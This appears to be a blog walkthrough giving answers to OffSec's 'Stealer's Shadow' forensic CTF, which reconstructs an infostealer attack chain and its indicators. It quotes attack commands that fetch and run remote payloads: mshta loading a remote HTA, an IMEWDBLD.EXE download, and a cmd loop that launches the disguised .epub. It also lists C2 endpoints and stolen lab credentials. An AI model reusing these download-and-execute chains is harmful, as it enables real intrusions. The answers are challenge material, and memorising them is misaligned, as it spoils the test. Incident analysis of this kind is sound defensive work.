Stealer's Shadow Offsec CTF Answers
Unlock the complete walkthrough for OffSec’s Stealer’s Shadow – Room of Echo Response challenge. Learn exploitation steps, payload techniques, privilege escalation, and CTF strategies to boost your penetration testing and cybersecurity skills.
Jawstar
11/26/2025, 4 min read


Lab Instructions
Download the ZIP package. The password is "Shadow234@".
Thanks to your actions during the ProtoVault incident, you've gained the trust of the Etherians. The OffSec Legend, Cipherflare has called upon you to investigate the breach before more damage is done.
The Etherians offer fragments of evidence, just enough to begin the investigation:
The user directory of a.smith@megacorpone.com from the machine WK001
Event logs from WK001
A ZIP archive awaits you.
Uncover the truth hidden in the darkness. Find what was taken, and how.
The attackers successfully exfiltrated data from the compromised system. What specific file was exfiltrated and which program was used to carry out the exfiltration? Please also include the SHA-256 hashes, along the filenames, for both the exfiltrated file and the program used.
Exfiltrated file: 101010245WK001_protected.zip
SHA-256: 0324d54bc6c0f2dfa54b32bc68c16fd401778c10a9e9780b9cda0f31ae960d9c
Program used: captcha_privacy[1].epub
SHA-256: a88fedc93a1d80c8cea08fbcb6b001293ddf357e27d268b32c5cfd23a49e96ed
Discovery: Found in Sysmon logs (Event ID 23 - File Delete/Archive operation)
How was the exfiltration program downloaded and executed on the compromised system? Make sure to specify the tool, script, or method used to download the program, where it was downloaded to, and how it could be executed.
Download method: Malicious HTA using IMEWDBLD.EXE to HTTP-download the payload
Download location: User web cache at ...INetCache\IE\66HCZK0X\captcha_privacy[1].epub
Execution method: Registry hijack of .epub to exefile, then a start command to launch the downloaded .epub as an executable
Technical Details:
LOLBin abuse of Windows IME Dictionary Builder (IMEWDBLD.EXE)
Registry modification allowed .epub files to execute as programs
Automated execution via cmd.exe loop searching INetCache
Describe how the attackers achieved code execution on the target machine to download and run the exfiltration program (from exercises 1 and 2). Your answer must clearly explain each stage of the attack in chronological order, starting from initial contact and ending with the execution of the downloaded program. Include all relevant technical indicators such as exact URLs, commands, IP addresses, usernames, redirects, payload loading sources, and other IoCs. Be specific about how and where payloads or commands were retrieved, especially if loaded from remote resources.
Stage 1: Initial Contact - Phishing Email
Date: August 5, 2025 at 08:35:42 UTC
Source IP: 99.91.94.11
Sender: billing@zaffrevelox.com (spoofed as Spamwarriors Filter)
Recipient: a.smith@megacorpone.com
Subject: "License Renewal Notice"
Malicious Link: http://www.zaffrevelox.com

Stage 2: Redirect to Fake CAPTCHA
User clicked the link, which redirected to: https://pfusioncaptcha.com
Site presented a fake "I'm not a robot" CAPTCHA verification page

Stage 3: Blockchain-Based Payload Delivery
JavaScript on pfusioncaptcha.com made an eth_call to a smart contract:
RPC Server: http://31.17.87.96:8545/
Smart Contract: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512
Function Selector: 0x2cae8ae4
Retrieved Base64-encoded command: mshta.exe http://pfusioncaptcha.com/13221442.hta
Command automatically copied to clipboard

Stage 4: Social Engineering Execution
Page instructed user to: Press Windows+R, Ctrl+V, Enter
User executed: "C:\WINDOWS\System32\mshta.exe" http://pfusioncaptcha.com/13221442.hta
Time: 2025-08-05 09:01:16 UTC
Process ID: 19424

Stage 5: HTA Downloads Malware (LOLBin Abuse)
HTA script spawned: "C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE" http://news.axonbyte.org:8000/captcha_privacy.epub
DNS Resolution: news.axonbyte.org → 145.1.0.92
Downloaded to: C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache\IE\66HCZK0X\captcha_privacy[1].epub

Stage 6: Registry Hijack
HTA modified registry: .epub extension → exefile type

Stage 7: Automated Execution
Command: cmd.exe /c for /r "C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache" %i in (*.epub) do (start "" "%i" & exit)
Executed captcha_privacy[1].epub as malware (PID: 17852)
User Context: MEGACORPONE\a.smith on WK001.megacorpone.com (10.10.10.245)

Complete IoC List:
IPs:
99.91.94.11 (phishing infrastructure)
31.17.87.96 (blockchain RPC server)
145.1.0.92 (C2 server and malware download)
URLs:
Email: http://www.zaffrevelox.com → Redirect to https://pfusioncaptcha.com
HTA: http://pfusioncaptcha.com/13221442.hta
Download: http://news.axonbyte.org:8000/captcha_privacy.epub
Blockchain:
Contract: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512
RPC Endpoint: 31.17.87.96:8545
Analyze the exfiltration program and identify the endpoints used by the attacker. For each endpoint, provide only the path component (e.g., /test) without parameters, not the full URL, and explain its specific purpose and role in the attack. For example, if the attacker used https://example.com/test to retrieve the C2 configuration, your answer should list /test with an explanation of its function. You must provide at least two valid endpoints with their corresponding explanations.
/life — Heartbeat / status beacon
Periodic check-ins from the host: minimal telemetry (host ID, uptime, timestamp, IP)
Used to confirm reachability and track alive clients

/send_message — Data exfiltration endpoint
Uploads collected data or files (supports chunking/resume)
Accepts metadata (filename, size, mime) and the encrypted payload

/receive_message — Command & control pull
Client polls for operator instructions: job IDs, commands, execution parameters, and scheduled tasks
Responses are short to minimize noise

/feed — Covert RSS/Atom channel for config/ops
Stealthy distribution channel that looks like a benign RSS feed
Used to deliver encrypted configs, staged tasks, or operator signals without direct C2 connections
Further analyze the exfiltration program to determine how the exfiltrated data was protected. Your answer must specify the exact encryption algorithm used and explain the full structure of the password, including each of its components and how they are combined.
Encryption Scheme: WinZip AE-2 (AES-256)
Keys derived using PBKDF2 with HMAC-SHA1 (1,000 iterations) and a per-file salt
Data encrypted with AES-256 in CTR mode
Authenticated via HMAC-SHA1
Each ZIP member includes a 2-byte password verifier
Password Structure:
Formula: Machine GUID (hyphens removed) + Hostname
GUID: cc9441e5-1c80-4287-9c7a-4c03215c0969
Hostname: WK001
Password: cc9441e51c8042879c7a4c03215c0969WK001
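To check the recovered password structure against an AE-2 member without a full unzip, the following added example (not part of the writeup or the challenge files) rebuilds the password from the Machine GUID and hostname, runs the WinZip AE-2 key schedule (PBKDF2-HMAC-SHA1, 1,000 rounds, 16-byte salt for AES-256), and compares the 2-byte password verifier and the 10-byte HMAC-SHA1 authentication code. The salt, ciphertext and stored values below are constructed; in practice they are read from the encrypted ZIP entry.

```python
import hashlib
import hmac

# Values from the investigation: Machine GUID and hostname of WK001.
MACHINE_GUID = "cc9441e5-1c80-4287-9c7a-4c03215c0969"
HOSTNAME = "WK001"

# WinZip AE-2 parameters for AES-256 (encryption strength 0x03).
AE_ITERATIONS = 1000
AE_SALT_LEN = 16      # AES-256 entries carry a 16-byte salt before the verifier
AE_KEY_LEN = 32       # AES-256 key length; the HMAC-SHA1 key is the same size
AE_AUTH_LEN = 10      # authentication code is the truncated HMAC-SHA1


def build_password(machine_guid: str, hostname: str) -> str:
    """Password = Machine GUID with hyphens stripped, followed by the hostname."""
    return machine_guid.replace("-", "") + hostname


def derive_ae2_keys(password: str, salt: bytes) -> tuple:
    """PBKDF2-HMAC-SHA1 -> (AES key, HMAC key, 2-byte password verifier)."""
    if len(salt) != AE_SALT_LEN:
        raise ValueError("AES-256 AE-2 entries use a 16-byte salt")
    material = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt,
                                   AE_ITERATIONS, 2 * AE_KEY_LEN + 2)
    aes_key = material[:AE_KEY_LEN]
    mac_key = material[AE_KEY_LEN:2 * AE_KEY_LEN]
    verifier = material[2 * AE_KEY_LEN:]
    return aes_key, mac_key, verifier


def password_matches(password: str, salt: bytes, stored_verifier: bytes) -> bool:
    """Cheap pre-check: only 16 bits, so a match still needs the HMAC to confirm."""
    return hmac.compare_digest(derive_ae2_keys(password, salt)[2], stored_verifier)


def auth_code(mac_key: bytes, ciphertext: bytes) -> bytes:
    """AE-2 authentication code: first 10 bytes of HMAC-SHA1 over the ciphertext."""
    return hmac.new(mac_key, ciphertext, hashlib.sha1).digest()[:AE_AUTH_LEN]


def ciphertext_authentic(mac_key: bytes, ciphertext: bytes, stored_auth: bytes) -> bool:
    """True when the stored auth code matches; any tampered byte breaks it."""
    return hmac.compare_digest(auth_code(mac_key, ciphertext), stored_auth)


if __name__ == "__main__":
    salt = bytes(range(16))                 # constructed; read from the ZIP entry in practice
    pw = build_password(MACHINE_GUID, HOSTNAME)
    aes_key, mac_key, verifier = derive_ae2_keys(pw, salt)
    print(pw, verifier.hex(), password_matches(pw, salt, verifier))
```

Decrypting the member body additionally needs AES-256 in CTR mode with WinZip's little-endian block counter; a library that implements the full WinZip AES format, such as pyzipper, handles that step.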
Review the exfiltrated data to identify a specific piece of sensitive information that could enable further compromise of the enterprise infrastructure. Explain from where this sensitive piece of information was stolen and provide it as answer to this exercise. For the latter, make sure to include the compromised accounts, passwords, and all affected services.
Source: Stolen from Chrome browser's saved passwords
Compromised Accounts:
[
  {
    "origin": "https://portal.azure.com/",
    "username": "a.smith@megacorpone.com",
    "password": "ADG135QET246!v!"
  },
  {
    "origin": "https://accounts.google.com/",
    "username": "a.smith@megacorpone.com",
    "password": "ADG135QET246!v!"
  }
]
Impact: These credentials provide access to:
Azure Portal (cloud infrastructure)
Google Workspace (email, documents, admin access)
Password reuse across multiple critical services
What IP addresses were involved in the attack chain and can be attributed to the attacker? Make sure to include all IP addresses that the attacker utilized. This includes remote resources that payloads were loaded from. Enter at least 4.
31.17.87.96:8545
145.1.0.92:8000
145.1.0.92:443
99.91.94.11:80
